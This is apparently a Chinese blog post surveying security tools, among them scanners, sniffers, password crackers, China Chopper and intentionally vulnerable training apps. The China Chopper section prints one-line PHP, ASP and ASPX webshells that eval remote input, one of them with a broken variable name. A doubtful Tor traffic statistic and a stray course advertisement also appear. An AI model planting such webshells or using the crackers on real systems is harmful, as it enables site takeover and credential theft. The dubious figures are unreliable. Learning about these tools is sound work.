网络安全学习中的工具

1>  Nmap

      Nmap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。

      系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。

      其基本功能有三个,一是探测一组主机是否在线;其次是扫描 主机端口,嗅探所提供的网络服务;还可以推断主机所用的操作系统 。

2>   P0f

       p0f是一个纯粹的被动指纹识别工具,它在不干涉双方通信的情况下,通过嗅探的方式来分析流经某一网卡的流量以达到指纹识别的目的。

       我们可以利用该工具进行渗透测试以及日常的网络管理,探测内网中可疑的网络连接。

       能够快速识别一个tcp连接两端的主机操作系统,因为它是被动识别工具,所以在某些nmap被禁止、不可靠、太慢或者会触发警报的情况下,它仍然能够很好的工作

       探测系统uptime,network hookup,距离(包括位于nat或者包过滤器后的网络环境)等等

       自动探测NAT,负载均衡,应用级的代理设置情况

       探测一些客户端/服务器的X-Mailer与User-Agent

3> Cain and Abel

      一个可以破解屏保、PWL密码、共享密码、缓存口令、远程共享口令、SMB口令、支持VNC口令解码、Cisco Type-7口令解码、Base64口令解码、SQL Server 7.0/2000口令解码、Remote Desktop口令解码、Access Database口令解码、Cisco PIX Firewall口令解码、Cisco MD5解码、NTLM Session Security口令解码、IKE Aggressive Mode Pre-Shared Keys口令解码、Dialup口令解码、远程桌面口令解码等综合工具,还可以远程破解,可以挂字典以及暴力破解

     内置的有sniffer,其功能极其强大,几乎可以明文捕获一切帐号口令,包括FTP、HTTP、IMAP、POP3、SMB、TELNET、VNC、TDS、SMTP、MSKERB5-PREAUTH、MSN、RADIUS-KEYS、RADIUS-USERS、ICQ、IKE Aggressive Mode Pre-Shared Keys authentications

4.>  Wireshark

      是一个网络封包分析软件。网络管理员使用Wireshark来检测网络问题,网络安全工程师使用Wireshark来检查资讯安全相关问题,开发者使用Wireshark来为新的通讯协定除错,普通使用者使用Wireshark来学习网络协定的相关知识。当然,有的人也会“居心叵测”的用它来寻找一些敏感信息……

5>  Kismet

      在Kali Linux中,提供了一款嗅探无线网络工具Kismet。可以测量周围的无线信号,并查看所有可用的无线接入点。

6>  John The Ripper

       John the Ripper是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文,支持目前大多数的加密算法,如DES、MD4、MD5等。

       但凡是暴力破解密码,都需要一个足够强悍的密码字典。John the Ripper的默认密码字典为run目录下的password.lst     

       Kali中自带John

7>  Tor

      Tor虽然不是网络匿名访问的唯一手段,但它是目前最流行、最受开发者欢迎的,可以接入约3万个暗网,流量占整个互联网流量的3.4%。

8>  中国菜刀  

      主要功能有:文件管理,虚拟终端,数据库管理

     1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;

     2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)

     3.数据库管理:[特色]图形界面,支持YSQL,MSSQL,ORACLE,INFOMIX,ACCESS

      以入支持ADO方式连接的数据库。

      只要往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站  

  

一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下:

php:<?php @eval($_post['pass']);?>

asp:<%eval request ("pass")%>

aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

 

9>  溜课神奇

     一款为想要学习编程的人提供的视频教程软件,这款软件内置了最全面的的网络视频资源,你可以通过这款软件学习到最详细的开发、编程、互联网等专业内容

10>  

静态分析

 

Brakeman :一个静态安全漏洞扫描工具,用于Ruby写的Rails应用。

密码学

Xortool:一个用于分析多字节xor异或小工具,批量解密网络封包,粗糙版。

CTF工具

Pwntools: 一个CTF框架和漏洞利用开发库,用Python开发,旨在让使用者简单快速的编写exploit。

Docker

Docker Bench for Security

       检查关于在生产环境中部署Docker容器的几十个常见最佳实践。这些测试都是自动化的,其灵感来自CIS Docker基准1.2.0版

  这种安全扫描类似于安全基线检查,对相应的项进行逐条核查,可以有效地规避一些安全风险。    

DVWA : 漏洞网站应用平台 (DVWA) 是一个有大量漏洞的 PHP/MySQL 网站应用,是一款渗透测试的演练系统,我们通常将演练系统称为靶机。

                https://github.com/ethicalhack3r/DVWA 

OWASP Juice Shop: 一个故意的不安全网站应用,用于安全培训,完全使用Javascript开发,包含所有的OWASP Top 10漏洞以及其他的高危漏洞。

OWASP Mutillidae II : OWASP Mutillidae II 网站渗透测试实践系统,一款自由和开放源码的Web应用程序,其中包含了丰富的渗透测试项目,如SQL注入、跨站脚本、clickjacking、本地文件包含、远程代码执行等。

OWASP NodeGoat :一个学习环境,用来学习OWASP Top 10安全威胁如何应用到网站安全中,用Node.js开发,以及如何有效利用。下载和使用方法:http://www.ucbug.com/jiaocheng/140727.html

OWASP Railsgoat :根据 OWASP Top 10的Rails漏洞版本.

OWASP Security Shepherd :一个网站和移动安全应用训练平台.

OWASP WebGoat : 一个故意不安全的网站应用.

OWASP ZAP :嵌入到docker容器中的owasp zed攻击稳定版本。

Security Ninjas :一个开源的应用安全培训计划.

Vulnerability as a service: Heartbleed :漏洞即服务: CVE 2014-0160.

Vulnerability as a service: Shellshock : 漏洞即服务: CVE 2014-6271.

WPScan :Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能;

该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

取证

文件取证

Autopsy :具有您在商业取证工具中所期望的核心功能,Autopsy是一种快速,全面,高效的硬盘调查解决方案,可根据您的需求而发展;一个数字取证平台和图形接口用于侦察工具和其他数字取证工具。

<

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值